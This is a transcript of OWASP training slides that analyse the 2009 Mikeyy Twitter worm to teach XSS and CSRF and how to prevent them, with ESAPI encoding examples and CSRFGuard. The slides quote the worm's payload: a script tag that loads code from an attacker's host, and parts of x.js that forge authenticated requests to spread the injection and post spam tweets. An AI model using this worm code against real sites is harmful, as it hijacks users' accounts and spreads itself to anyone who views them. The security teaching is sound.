analysis of deadly combination of xss ... - owasp foundationanalysis of deadly combination of xss...
TRANSCRIPT
Analysis of Deadly Combination of XSS and CSRF
OWASP Top 10 - Session 1 Modified for OWASP Tampa Day 2011
Sherif Koussa
Those who do not learn from history are doomed to repeat it
WHY A TWITTER WORM?
George Santayana
• Mikeyy Twitter Attack
• Understanding of XSS
• XSS Mitigation
• Understanding of CSRF
• CSRF Mitigation
• Questions
Agenda
• OWASP Ottawa, Canada Chapter Leader
• SANS Steering Committee Member for GSSP-Java and GSSP-NET exams
• Exam Development Consultant for GIAC
• Principal Security Consultant at Software Secured
• Application Security Assessments
About Your Speaker
• Designed for Busy Organizations
• Focuses on OWASP Top 10
• No Travel
• No Developer’s Downtime
• No Evenings or Weekends
• 7.5 Hours
OWASP TOP 10 – Java Developer Training
Who is a Tweeter?
“Twitter is a social networking
and microblogging service
that enables its users to send
and read messages that are called
Tweets” - Wikipedia
What is Twitter?
• Twitter Worm on April 11th, 2009
• 4 Versions in 48 hours
• 1 version alone infected 18,000 accounts
• Combination of XSS and CSRF
Mikeyy Twitter Worm
• Mikeyy owned a Twitter replica called StalkDaily
• Mikeyy’s aim was to drive traffic from Twitter to his website.
Mikeyy Twitter Worm
• Twitter used an Anti-CSRF Mechanism
• However, the page was vulnerable to XSS
• XSS deems any Anti-CSRF solution useless
• The combination was used to spread the worm
Mikeyy Twitter Worm
• URL Field was vulnerable to XSS
• The attacker was able to inject:
Mikeyy Twitter Worm
<script src=http://mikeyylolz.uuuq.com/x.js/>
• The source code of the attacker’s own profile page looked like this:
• Visitors’ browser will load x.js file once they visit his profile page.
Mikeyy Twitter Worm
Info: <a href=www.stalkdaily.com/> <script
src=http://mikeyylolz.uuuq.com/x.js/>
www.twitter.com\mikeyy
Mikeyy Twitter Worm
Cross-Site Scripting The Definition
Cross-Site Scripting is the execution of
unintended code, usually JavaScript, injected by
an attacker in the victim’s browser.
XSS Example
• A normal usage of the parameter email would consist of characters, integers and the letters ‘. - _ @’
• Provided that email contains the value [email protected], the rendered HTML will be
<% String email = request.getParameter("email"); %>
...
Email Address: <%= email %>
Email Address: [email protected]
XSS Example
• An attacker can inject the request with a malicious value for the parameter email
• Assume that email contains the value
• The rendered HTML will actually take an executable form.
<% String email = request.getParameter("email"); %>
...
Email Address: <%= email %>
<script>alert(document.cookie)</script>
The JSP
<html>
<body>
<div>
<% String email =
request.getParameter("email"); %>
Email Address: <%= email %>
</div>
</body>
</html>
18
The Malicious HTML
<html>
<body>
<div>
<script>alert(document.cookie)</script>
</div>
</body>
</html>
20
How to Spot XSS?
• Anything retrieved from the request request.getParameter()
request.gerHeader()
request.getCookie()
request.getQueryString()
. . . .etc
• Anything retrieved from the database
• Encode output data using libraries like ESAPI from OWASP.
• Sanitize input data using strong white lists.
• Properly quote around your data
• Understand the data context
• Use HTTPOnly
• Leverage framework’s built-in controls
XSS: How to Fix It
• HTML Context
• HTML Attribute Context
• JavaScript Context
• URL Context
• CSS Context
Different HTML Contexts
• Where: Inside any HTML Tag
• Dangerous Characters: < > ‘ “ &
• Mitigation: Using ESAPI:
Mitigation in HTML Context Java Example
<td><%=request.getParameter( "input" )%> </td>
<td><%=ESAPI.encoder().encodeForHTML(
request.getParameter( "input" ))%> </td>
• Where: For any non-event handler HTML attribute. For example:
• Dangerous Characters: [space] % * + , - / ; < = > ^ |
• Mitigation: Using ESAPI:
Mitigation in HTML Attribute Context - Java Example
<div name=<%= request.getParameter( "input" )%> </div>
<div name=‘<%=ESAPI.encoder().encodeForHTMLAttribute(
request.getParameter( "input" ))%>’ </div>
• Where: Inside <script> tags and any HTML event-handler attribute
• Dangerous Characters: [space] % * + , - / ; < = > ^ |
• Mitigation: Using ESAPI:
Mitigation in JavaScript Context Java Example
<script>var safe= <%= request.getParameter("input")%>; </script>
<script>var safe= ‘<%=ESAPI.encoder().encodeForJavascript(
request.getParameter("input"))%>’; </script>
• Where: For any non-event handler and non-style HTML attribute
• Dangerous Characters: [space] % * + , - / ; < = > ^ |
• Mitigation: Using ESAPI:
Mitigation in URL Context Java Example
<img src=<%= request.getParameter( "input" )%> </img>
<img src=‘<%=ESAPI.encoder().encodeForURL(
request.getParameter( "input" ))%>’ </img>
• Where: For any non-event handler and non-style HTML attribute
• Dangerous Characters: [space] % * + , - / ; < = > ^ and |
• Mitigation: Using ESAPI:
Mitigation in CSS Context Java Example
<span style=‚color:<%=request.getParameter(‚color‛)%>‛>…</span>
<span
style=‚color:<%=ESAPI.encoder().encodeForCSS(request.getParameter(‚co
lor‛))%>‛>…</span>
PAY ATTENTION
XSS LAB
‚ < ‚ -> ‚>‛ ‚\u003c‛
‚ > ‚ -> ‚<‛ ‚\u003e‛
‚ & ‚ -> ‚&‛ ‚\u0027‛
‚ ’ ‚ -> ‚"‛ ‚\u0022‛
‚ ‛ ‚ -> ‚'‛ ‚\u0026‛
Lab
Hello my name is Sherif
<script>alert("You are just
XSSed");</script> This is an
Innocent message box
ANSWERS
Hello my name is Sherif
<script>alert("You are
just XSSed");</script>
This is an innocent message box
ANSWERS
Cross-Site Request Forgery is an attack
where an adversary tricks an
authenticated victim into performing
an action unknowingly.
CSRF: The Definition
CSRF: Example
Example scenario:
• Using Post Only Requests
• Implementing Referrer Checks
• Using a Secret Cookie
CSRF: What Does Not Work
• Use Anti-CSRF solutions:
– CSRF Guard
– ASP.NET: ViewStateUserKey + EnableViewStateMac
• Un-predictable ID that is tied to the user session on every request
CSRF: What Works
• ING Direct: Additional accounts were created on behalf on an arbitrary user. Funds were also transferred out of user’s account.
• YouTube: Every single action was vulnerable to CSRF. Videos can be added, marked as inappropriate, subscribe to channels…etc
• MetaFilter: An attacker can take control of a user’s account
• The New York Times: Subscribers’ emails can be easily forged.
• Twitter: Seen earlier
• ….Probably Many Others?
CSRF: Vulnerable Sites
• CSRF Guard
• Install and forget
• Hashed PRNG
CSRF: CSRF Mitigation Example – CSRF Guard
CSRF: CSRF Mitigation Example – CSRF Guard
Add Token to HTML
User (Browser)
Business Processing
OWASP CSRFGuard
Verify Token
1. Add token with regex
2. Add token with HTML parser
3. Add token in browser with
Javascript
BACK TO THE ATTACK
Mikeyy Twitter Worm
• The source code of the attacker’s own profile page looked like this:
• Visitors’ browser will load x.js file once they visit his profile page.
Mikeyy Twitter Worm
Info: <a href=www.stalkdaily.com/> <script
src=http://mikeyylolz.uuuq.com/x.js/>
• The XSS part of the attack is complete
• X.js is a JavaScript file that launched the CSRF part of the attack
Twitter Worm
Twitter Worm
The worm now infected the viewer’s page and anyone who viewed an infected page
var xss = urlencode('http://www.stalkdaily.com"></a><script
src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn1.connect("/account/settings", "POST",
"authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
Part of X.js that shows CSRF attack
• The list of tweets in an Array
• Finally, code to send random automated tweets
Twitter Worm
var randomUpdate=new Array(); randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?"; randomUpdate[1]="Join www.StalkDaily.com everyone!"; randomUpdate[2]="Woooo, www.StalkDaily.com :)"; randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!"; randomUpdate[4]="Wow...www.StalkDaily.com"; randomUpdate[5]="@twitter www.StalkDaily.com";
var ajaxConn = new XHConn(); ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
Part of X.js that shows CSRF attack
Part of X.js that shows the list of automated updates\tweets
www.twitter.com\mikeyy
Mikeyy Twitter Worm
Questions?
• http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://msdn.microsoft.com/en-us/library/ms972969.aspx#securitybarriers_topic2
• http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/
• http://www.freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks
• http://unitstep.net/blog/2009/04/13/how-the-twitter-stalkdaily-worm-spread-so-fast/
References